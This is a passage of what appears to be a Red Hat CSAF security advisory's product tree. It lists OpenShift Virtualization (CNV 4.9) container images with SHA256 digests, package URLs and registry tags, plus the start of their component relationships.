"container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", product: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", product_id: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", product_identification_helper: { purl: "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8&tag=v4.9.6-5", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.9.6-5", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.9.6-6", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", product: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", product_id: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-v2v-conversion&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", product: { name: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", product_id: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-vmware&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", product: { name: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", product_id: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", product_identification_helper: { purl: "pkg:oci/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", product: { name: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", product_id: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", product_id: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", product_id: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", product_id: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", product_id: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", product: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", product_id: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-controller-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", product: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", product_id: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-operator-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", product: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", product_id: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-virtv2v-rhel8&tag=v4.9.6-3", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", }, product_reference: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64 as a component of CNV 4.9 for RHEL 8", product_id: 